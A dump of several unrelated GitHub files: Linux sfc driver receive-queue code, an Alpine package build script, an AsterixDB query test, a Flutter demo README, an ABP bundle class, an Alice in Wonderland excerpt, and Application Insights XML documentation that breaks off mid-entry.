skb_record_rx_queue(skb, channel->rx_queue.core_index);
/* Set the SKB flags */
skb_checksum_none_assert(skb);
if (likely(rx_buf->flags & EFX_RX_PKT_CSUMMED)) {
skb->ip_summed = CHECKSUM_UNNECESSARY;
skb->csum_level = !!(rx_buf->flags & EFX_RX_PKT_CSUM_LEVEL);
}
efx_rx_skb_attach_timestamp(channel, skb);
if (channel->type->receive_skb)
if (channel->type->receive_skb(channel, skb))
return;
/* Pass the packet up */
netif_receive_skb(skb);
}
/* Handle a received packet. Second half: Touches packet payload. */
void __efx_rx_packet(struct efx_channel *channel)
{
struct efx_nic *efx = channel->efx;
struct efx_rx_buffer *rx_buf =
efx_rx_buffer(&channel->rx_queue, channel->rx_pkt_index);
u8 *eh = efx_rx_buf_va(rx_buf);
/* Read length from the prefix if necessary. This already
* excludes the length of the prefix itself.
*/
if (rx_buf->flags & EFX_RX_PKT_PREFIX_LEN)
rx_buf->len = le16_to_cpup((__le16 *)
(eh + efx->rx_packet_len_offset));
/* If we're in loopback test, then pass the packet directly to the
* loopback layer, and free the rx_buf here
*/
if (unlikely(efx->loopback_selftest)) {
struct efx_rx_queue *rx_queue;
efx_loopback_rx_packet(efx, eh, rx_buf->len);
rx_queue = efx_channel_get_rx_queue(channel);
efx_free_rx_buffers(rx_queue, rx_buf,
channel->rx_pkt_n_frags);
goto out;
}
if (unlikely(!(efx->net_dev->features & NETIF_F_RXCSUM)))
rx_buf->flags &= ~EFX_RX_PKT_CSUMMED;
if ((rx_buf->flags & EFX_RX_PKT_TCP) && !channel->type->receive_skb)
efx_rx_packet_gro(channel, rx_buf, channel->rx_pkt_n_frags, eh);
else
efx_rx_deliver(channel, eh, rx_buf, channel->rx_pkt_n_frags);
out:
channel->rx_pkt_n_frags = 0;
}
int efx_probe_rx_queue(struct efx_rx_queue *rx_queue)
{
struct efx_nic *efx = rx_queue->efx;
unsigned int entries;
int rc;
/* Create the smallest power-of-two aligned ring */
entries = max(roundup_pow_of_two(efx->rxq_entries), EFX_MIN_DMAQ_SIZE);
EFX_WARN_ON_PARANOID(entries > EFX_MAX_DMAQ_SIZE);
rx_queue->ptr_mask = entries - 1;
netif_dbg(efx, probe, efx->net_dev,
"creating RX queue %d size %#x mask %#x\n",
efx_rx_queue_index(rx_queue), efx->rxq_entries,
rx_queue->ptr_mask);
/* Allocate RX buffers */
rx_queue->buffer = kcalloc(entries, sizeof(*rx_queue->buffer),
GFP_KERNEL);
if (!rx_queue->buffer)
return -ENOMEM;
rc = efx_nic_probe_rx(rx_queue);
if (rc) {
kfree(rx_queue->buffer);
rx_queue->buffer = NULL;
}
return rc;
}
static void efx_init_rx_recycle_ring(struct efx_nic *efx,
struct efx_rx_queue *rx_queue)
{
unsigned int bufs_in_recycle_ring, page_ring_size;
/* Set the RX recycle ring size */
#ifdef CONFIG_PPC64
bufs_in_recycle_ring = EFX_RECYCLE_RING_SIZE_IOMMU;
#else
if (iommu_present(&pci_bus_type))
bufs_in_recycle_ring = EFX_RECYCLE_RING_SIZE_IOMMU;
else
bufs_in_recycle_ring = EFX_RECYCLE_RING_SIZE_NOIOMMU;
#endif /* CONFIG_PPC64 */
page_ring_size = roundup_pow_of_two(bufs_in_recycle_ring /
efx->rx_bufs_per_page);
rx_queue->page_ring = kcalloc(page_ring_size,
sizeof(*rx_queue->page_ring), GFP_KERNEL);
rx_queue->page_ptr_mask = page_ring_size - 1;
}
void efx_init_rx_queue(struct efx_rx_queue *rx_queue)
{
struct efx_nic *efx = rx_queue->efx;
unsigned int max_fill, trigger, max_trigger;
netif_dbg(rx_queue->efx, drv, rx_queue->efx->net_dev,
"initialising RX queue %d\n", efx_rx_queue_index(rx_queue));
/* Initialise ptr fields */
rx_queue->added_count = 0;
rx_queue->notified_count = 0;
rx_queue->removed_count = 0;
rx_queue->min_fill = -1U;
efx_init_rx_recycle_ring(efx, rx_queue);
rx_queue->page_remove = 0;
rx_queue->page_add = rx_queue->page_ptr_mask + 1;
rx_queue->page_recycle_count = 0;
rx_queue->page_recycle_failed = 0;
rx_queue->page_recycle_full = 0;
/* Initialise limit fields */
max_fill = efx->rxq_entries - EFX_RXD_HEAD_ROOM;
max_trigger =
max_fill - efx->rx_pages_per_batch * efx->rx_bufs_per_page;
if (rx_refill_threshold != 0) {
trigger = max_fill * min(rx_refill_threshold, 100U) / 100U;
if (trigger > max_trigger)
trigger = max_trigger;
} else {
trigger = max_trigger;
}
rx_queue->max_fill = max_fill;
rx_queue->fast_fill_trigger = trigger;
rx_queue->refill_enabled = true;
/* Set up RX descriptor ring */
efx_nic_init_rx(rx_queue);
}
void efx_fini_rx_queue(struct efx_rx_queue *rx_queue)
{
int i;
struct efx_nic *efx = rx_queue->efx;
struct efx_rx_buffer *rx_buf;
netif_dbg(rx_queue->efx, drv, rx_queue->efx->net_dev,
"shutting down RX queue %d\n", efx_rx_queue_index(rx_queue));
del_timer_sync(&rx_queue->slow_fill);
/* Release RX buffers from the current read ptr to the write ptr */
if (rx_queue->buffer) {
for (i = rx_queue->removed_count; i < rx_queue->added_count;
i++) {
unsigned index = i & rx_queue->ptr_mask;
rx_buf = efx_rx_buffer(rx_queue, index);
efx_fini_rx_buffer(rx_queue, rx_buf);
}
}
/* Unmap and release the pages in the recycle ring. Remove the ring. */
for (i = 0; i <= rx_queue->page_ptr_mask; i++) {
struct page *page = rx_queue->page_ring[i];
struct efx_rx_page_state *state;
if (page == NULL)
continue;
state = page_address(page);
dma_unmap_page(&efx->pci_dev->dev, state->dma_addr,
PAGE_SIZE << efx->rx_buffer_order,
DMA_FROM_DEVICE);
put_page(page);
}
kfree(rx_queue->page_ring);
rx_queue->page_ring = NULL;
}
void efx_remove_rx_queue(struct efx_rx_queue *rx_queue)
{
netif_dbg(rx_queue->efx, drv, rx_queue->efx->net_dev,
"destroying RX queue %d\n", efx_rx_queue_index(rx_queue));
efx_nic_remove_rx(rx_queue);
kfree(rx_queue->buffer);
rx_queue->buffer = NULL;
}
module_param(rx_refill_threshold, uint, 0444);
MODULE_PARM_DESC(rx_refill_threshold,
"RX descriptor ring refill threshold (%)");
#ifdef CONFIG_RFS_ACCEL
int efx_filter_rfs(struct net_device *net_dev, const struct sk_buff *skb,
u16 rxq_index, u32 flow_id)
{
struct efx_nic *efx = netdev_priv(net_dev);
struct efx_channel *channel;
struct efx_filter_spec spec;
struct flow_keys fk;
int rc;
if (flow_id == RPS_FLOW_ID_INVALID)
return -EINVAL;
if (!skb_flow_dissect_flow_keys(skb, &fk, 0))
return -EPROTONOSUPPORT;
if (fk.basic.n_proto != htons(ETH_P_IP) && fk.basic.n_proto != htons(ETH_P_IPV6))
return -EPROTONOSUPPORT;
if (fk.control.flags & FLOW_DIS_IS_FRAGMENT)
return -EPROTONOSUPPORT;
efx_filter_init_rx(&spec, EFX_FILTER_PRI_HINT,
efx->rx_scatter ? EFX_FILTER_FLAG_RX_SCATTER : 0,
rxq_index);
spec.match_flags =
EFX_FILTER_MATCH_ETHER_TYPE | EFX_FILTER_MATCH_IP_PROTO |
EFX_FILTER_MATCH_LOC_HOST | EFX_FILTER_MATCH_LOC_PORT |
EFX_FILTER_MATCH_REM_HOST | EFX_FILTER_MATCH_REM_PORT;
spec.ether_type = fk.basic.n_proto;
spec.ip_proto = fk.basic.ip_proto;
if (fk.basic.n_proto == htons(ETH_P_IP)) {
spec.rem_host[0] = fk.addrs.v4addrs.src;
spec.loc_host[0] = fk.addrs.v4addrs.dst;
} else {
memcpy(spec.rem_host, &fk.addrs.v6addrs.src, sizeof(struct in6_addr));
memcpy(spec.loc_host, &fk.addrs.v6addrs.dst, sizeof(struct in6_addr));
}
spec.rem_port = fk.ports.src;
spec.loc_port = fk.ports.dst;
rc = efx->type->filter_rfs_insert(efx, &spec);
if (rc < 0)
return rc;
/* Remember this so we can check whether to expire the filter later */
channel = efx_get_channel(efx, rxq_index);
channel->rps_flow_id[rc] = flow_id;
++channel->rfs_filters_added;
if (spec.ether_type == htons(ETH_P_IP))
netif_info(efx, rx_status, efx->net_dev,
"steering %s %pI4:%u:%pI4:%u to queue %u [flow %u filter %d]\n",
(spec.ip_proto == IPPROTO_TCP) ? "TCP" : "UDP",
spec.rem_host, ntohs(spec.rem_port), spec.loc_host,
ntohs(spec.loc_port), rxq_index, flow_id, rc);
else
netif_info(efx, rx_status, efx->net_dev,
"steering %s [%pI6]:%u:[%pI6]:%u to queue %u [flow %u filter %d]\n",
(spec.ip_proto == IPPROTO_TCP) ? "TCP" : "UDP",
spec.rem_host, ntohs(spec.rem_port), spec.loc_host,
ntohs(spec.loc_port), rxq_index, flow_id, rc);
return rc;
}
bool __efx_filter_rfs_expire(struct efx_nic *efx, unsigned int quota)
{
bool (*expire_one)(struct efx_nic *efx, u32 flow_id, unsigned int index);
unsigned int channel_idx, index, size;
u32 flow_id;
if (!spin_trylock_bh(&efx->filter_lock))
return false;
expire_one = efx->type->filter_rfs_expire_one;
channel_idx = efx->rps_expire_channel;
index = efx->rps_expire_index;
size = efx->type->max_rx_ip_filters;
while (quota--) {
struct efx_channel *channel = efx_get_channel(efx, channel_idx);
flow_id = channel->rps_flow_id[index];
if (flow_id != RPS_FLOW_ID_INVALID &&
expire_one(efx, flow_id, index)) {
netif_info(efx, rx_status, efx->net_dev,
"expired filter %d [queue %u flow %u]\n",
index, channel_idx, flow_id);
channel->rps_flow_id[index] = RPS_FLOW_ID_INVALID;
}
if (++index == size) {
if (++channel_idx == efx->n_channels)
channel_idx = 0;
index = 0;
}
}
efx->rps_expire_channel = channel_idx;
efx->rps_expire_index = index;
spin_unlock_bh(&efx->filter_lock);
return true;
}
#endif /* CONFIG_RFS_ACCEL */
/**
* efx_filter_is_mc_recipient - test whether spec is a multicast recipient
* @spec: Specification to test
*
* Return: %true if the specification is a non-drop RX filter that
* matches a local MAC address I/G bit value of 1 or matches a local
* IPv4 or IPv6 address value in the respective multicast address
* range. Otherwise %false.
*/
bool efx_filter_is_mc_recipient(const struct efx_filter_spec *spec)
{
if (!(spec->flags & EFX_FILTER_FLAG_RX) ||
spec->dmaq_id == EFX_FILTER_RX_DMAQ_ID_DROP)
return false;
if (spec->match_flags &
(EFX_FILTER_MATCH_LOC_MAC | EFX_FILTER_MATCH_LOC_MAC_IG) &&
is_multicast_ether_addr(spec->loc_mac))
return true;
if ((spec->match_flags &
(EFX_FILTER_MATCH_ETHER_TYPE | EFX_FILTER_MATCH_LOC_HOST)) ==
(EFX_FILTER_MATCH_ETHER_TYPE | EFX_FILTER_MATCH_LOC_HOST)) {
if (spec->ether_type == htons(ETH_P_IP) &&
ipv4_is_multicast(spec->loc_host[0]))
return true;
if (spec->ether_type == htons(ETH_P_IPV6) &&
((const u8 *)spec->loc_host)[0] == 0xff)
return true;
}
return false;
}
| {
"pile_set_name": "Github"
} |
# Contributor: Oleg Titov <oleg.titov@gmail.com>
# Maintainer: Oleg Titov <oleg.titov@gmail.com>
pkgname=py3-catalogue
pkgver=2.0.1
pkgrel=0
pkgdesc="Super lightweight function registries for your library"
url="https://github.com/explosion/catalogue"
arch="noarch"
license="MIT"
depends="py3-importlib-metadata"
makedepends="py3-setuptools"
checkdepends="py3-pytest"
subpackages="$pkgname-doc"
source="$pkgname-$pkgver.tar.gz::https://github.com/explosion/catalogue/archive/v$pkgver.tar.gz"
builddir=$srcdir/catalogue-$pkgver
build() {
python3 setup.py build
}
check() {
pytest-3 catalogue/tests/test_catalogue.py
}
package() {
python3 setup.py install --prefix=/usr --root="$pkgdir"
install -Dm644 README.md "$pkgdir/usr/share/doc/$pkgname/README.md"
}
sha512sums="a0fd0dcccbd8dfa2662b058882118c73b5d1afbbadda9a03d21212b7c75dc79d78432d31a1922523491aad092af20463ce1bbfb3cd286d95bab367cb2f67ed55 py3-catalogue-2.0.1.tar.gz"
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
{
"f1": (SELECT value BITCLEAR(6, 1))[0],
"f2": (SELECT value BITCLEAR(6, [1, 2]))[0],
"f3": (SELECT value BITCLEAR(31, [1, 2, 4, 5]))[0],
"f4": (SELECT value BITCLEAR(int8("31"), [int16("1"), float("2"), double("4"), 5]))[0]
}; | {
"pile_set_name": "Github"
} |
# will_pop_scope_demo
检测页面是否被弹出的demo。
收录于MTechViral的youtube视频https://www.youtube.com/watch?v=fYBCzgBRkb4&list=PLR2qQy0Zxs_Wot7YfLeeKdMlJ9838C_w0&index=2
## 样例
![](../../../image/will_pop.png)
![](../../../image/will_pop_form.png)
## Getting Started
For help getting started with Flutter, view our online
[documentation](https://flutter.io/).
| {
"pile_set_name": "Github"
} |
using System.Collections.Generic;
using Volo.Abp.AspNetCore.Mvc.UI.Bundling;
namespace Volo.CmsKit.Public.Web.Pages.CmsKit.Shared.Components.ReactionSelection
{
public class ReactionSelectionStyleBundleContributor : BundleContributor
{
public override void ConfigureBundle(BundleConfigurationContext context)
{
context.Files.AddIfNotContains("/Pages/CmsKit/Shared/Components/ReactionSelection/default.css");
}
}
} | {
"pile_set_name": "Github"
} |
'Go on with the next verse,' the Gryphon repeated impatiently: 'it
begins "I passed by his garden."'
Alice did not dare to disobey, though she felt sure it would all come
wrong, and she went on in a trembling voice:--
| {
"pile_set_name": "Github"
} |
<?xml version="1.0"?>
<doc xml:lang="en">
<assembly>
<name>Microsoft.AI.WindowsServer</name>
</assembly>
<members>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer">
<summary>
A telemetry initializer that will gather Azure Web App Role Environment context information.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppNameEnvironmentVariable">
<summary>Azure Web App name corresponding to the resource name.</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.WebAppHostNameEnvironmentVariable">
<summary>Azure Web App Hostname. This will include the deployment slot, but will be same across instances of same slot.</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureWebAppRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer">
<summary>
A telemetry initializer that will gather Azure Role Environment context information.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer" /> class.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.AzureRoleEnvironmentTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes <see cref="T:Microsoft.ApplicationInsights.Channel.ITelemetry" /> device context.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer">
<summary>
A telemetry context initializer that will set component context version on the base of BuildInfo.config information.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.version">
<summary>
The version for this component.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Initializes version of the telemetry item with the version obtained from build info if it is available.
</summary>
<param name="telemetry">The telemetry context to initialize.</param>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.LoadBuildInfoConfig">
<summary>
Loads BuildInfo.config and returns XElement.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.BuildInfoConfigComponentVersionTelemetryInitializer.GetVersion">
<summary>
Gets the version for the current application. If the version cannot be found, we will return the passed in default.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule">
<summary>
Telemetry module that sets developer mode to true when is not already set AND managed debugger is attached.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.IsDebuggerAttached">
<summary>
Function that checks whether debugger is attached with implementation that can be replaced by unit test code.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DeveloperModeWithDebuggerAttachedTelemetryModule.Initialize(Microsoft.ApplicationInsights.Extensibility.TelemetryConfiguration)">
<summary>
Gives the opportunity for this telemetry module to initialize configuration object that is passed to it.
</summary>
<param name="configuration">Configuration object.</param>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer">
<summary>
A telemetry context initializer that will gather device context information.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DeviceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Populates device properties on a telemetry item.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer">
<summary>
Obsolete. A telemetry context initializer that used to populate role instance name. Preserved for backward compatibility.
Note that role instance will still be populated with the machine name as in the previous versions.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.DomainNameRoleInstanceTelemetryInitializer.Initialize(Microsoft.ApplicationInsights.Channel.ITelemetry)">
<summary>
Obsolete method.
</summary>
<param name="telemetry">The telemetry to initialize.</param>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.instance">
<summary>
The singleton instance for our reader.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleName">
<summary>
The Azure role name (if any).
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.roleInstanceName">
<summary>
The Azure role instance name (if any).
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader"/> class.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Instance">
<summary>
Gets or sets the singleton instance for our application context reader.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.BaseDirectory">
<summary>
Gets or sets the base directly where hunting for application DLLs is to start.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.Initialize">
<summary>
Initializes the current reader with respect to its environment.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleName">
<summary>
Gets the Azure role name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.AzureRoleEnvironmentContextReader.GetRoleInstanceName">
<summary>
Gets the Azure role instance name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader">
<summary>
The reader is platform specific and applies to .NET applications only.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.Instance">
<summary>
Gets or sets the singleton instance for our application context reader.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetHostSystemLocale">
<summary>
Gets the host system locale.
</summary>
<returns>The discovered locale.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceType">
<summary>
Gets the type of the device.
</summary>
<returns>The type for this device as a hard-coded string.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceUniqueId">
<summary>
Gets the device unique ID, or uses the fallback if none is available due to application configuration.
</summary>
<returns>
The discovered device identifier.
</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetOemName">
<summary>
Gets the device OEM.
</summary>
<returns>The discovered OEM.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetDeviceModel">
<summary>
Gets the device model.
</summary>
<returns>The discovered device model.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.GetNetworkType">
<summary>
Gets the network type.
</summary>
<returns>The discovered network type.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.DeviceContextReader.RunWmiQuery(System.String,System.String,System.String)">
<summary>
Runs a single WMI query for a property.
</summary>
<param name="table">The table.</param>
<param name="property">The property.</param>
<param name="defaultValue">The default value of the property if WMI fails.</param>
<returns>The value if found, Unknown otherwise.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader">
<summary>
The user context reader interface used while reading user related information in a platform specific way.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.Initialize">
<summary>
Initializes the current reader with respect to its environment.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.GetRoleName">
<summary>
Gets the Azure role name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.IAzureRoleEnvironmentContextReader.GetRoleInstanceName">
<summary>
Gets the Azure role instance name.
</summary>
<returns>The extracted data.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role">
<summary>
Represents a role that is defined as part of a hosted service.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.#ctor(System.Object)">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role"/> class.
</summary>
<param name="targetObject">The target object.</param>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.Name">
<summary>
Gets the name of the role as it is declared in the service definition file.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.Role.GetTargetObjectInstance(System.Type,System.Object[])">
<summary>
Gets the target object instance.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
<returns>
The activated instance is one is required.
</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment">
<summary>
Provides information about the configuration, endpoints, and status of running role instances.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.#ctor">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment"/> class.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.IsAvailable">
<summary>
Gets a value indicating whether the role instance is running in the Windows Azure environment.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.DeploymentId">
<summary>
Gets the unique identifier of the deployment in which the role instance is running.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.CurrentRoleInstance">
<summary>
Gets a RoleInstance object that represents the role instance in which the code is currently running.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleEnvironment.GetTargetObjectInstance(System.Type,System.Object[])">
<summary>
Gets the target object instance.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
<returns>
The activated instance is one is required.
</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance">
<summary>
Represents an instance of a role.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.#ctor(System.Object)">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance"/> class.
</summary>
<param name="targetObject">The target object.</param>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.Id">
<summary>
Gets the instance identifier (ID) of the role instance.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.Role">
<summary>
Gets the Role object that is associated with the role instance.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RoleInstance.GetTargetObjectInstance(System.Type,System.Object[])">
<summary>
Gets the target object instance.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
<returns>
The activated instance is one is required.
</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject">
<summary>
A runtime bound object for a given .NET type.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.targetType">
<summary>
The target type for our object.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.targetObject">
<summary>
The target object.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.#ctor(System.Type,System.Object[])">
<summary>
Initializes a new instance of the <see cref="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject"/> class.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.TargetType">
<summary>
Gets or sets the type of the target.
</summary>
</member>
<member name="P:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.TargetObject">
<summary>
Gets or sets the target object.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetTargetObjectInstance(System.Type,System.Object[])">
<summary>
Gets the target object instance.
</summary>
<param name="targetType">Type of the target.</param>
<param name="activationArgs">The activation arguments.</param>
<returns>The activated instance is one is required.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Object[])">
<summary>
Gets the property.
</summary>
<param name="name">The name.</param>
<param name="args">The arguments.</param>
<returns>The value for our property.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Type[],System.Object[])">
<summary>
Gets the property.
</summary>
<param name="name">The name.</param>
<param name="parameterTypes">The parameter types.</param>
<param name="args">The arguments.</param>
<returns>The value for our property.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.GetProperty(System.String,System.Reflection.BindingFlags,System.Type[],System.Object[])">
<summary>
Gets the property.
</summary>
<param name="name">The name.</param>
<param name="bindingFlags">The binding flags.</param>
<param name="parameterTypes">The parameter types.</param>
<param name="args">The arguments.</param>
<returns>The value for our property.</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.RuntimeBindingObject.InvokeHelper(System.String,System.Reflection.BindingFlags,System.Object[],System.Globalization.CultureInfo)">
<summary>
Invocation helper for calling any member on our target object.
</summary>
<param name="name">The name.</param>
<param name="bindingFlags">The binding flags.</param>
<param name="args">The arguments.</param>
<param name="culture">The culture.</param>
<returns>The return value for our invocation.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.ServiceRuntime">
<summary>
The wrapper for the Azure Service Runtime.
</summary>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.ServiceRuntime.GetRoleEnvironment(System.String)">
<summary>
Gets the role environment.
</summary>
<param name="baseDirectory">The base directory.</param>
<returns>
The role environment object.
</returns>
</member>
<member name="M:Microsoft.ApplicationInsights.WindowsServer.Implementation.TypeHelpers.GetLoadedType(System.String,System.String)">
<summary>
Gets the type by type name from the assembly.
</summary>
<param name="typeName">The type name.</param>
<param name="assemblyName">The assembly name.</param>
<returns>Return type from assembly loaded in the process by assembly and type name.</returns>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource">
<summary>
ETW EventSource tracing class.
</summary>
</member>
<member name="F:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Log">
<summary>
Instance of the WindowsServerEventSource class.
</summary>
</member>
<member name="T:Microsoft.ApplicationInsights.WindowsServer.Implementation.WindowsServerEventSource.Keywords">
<summary>
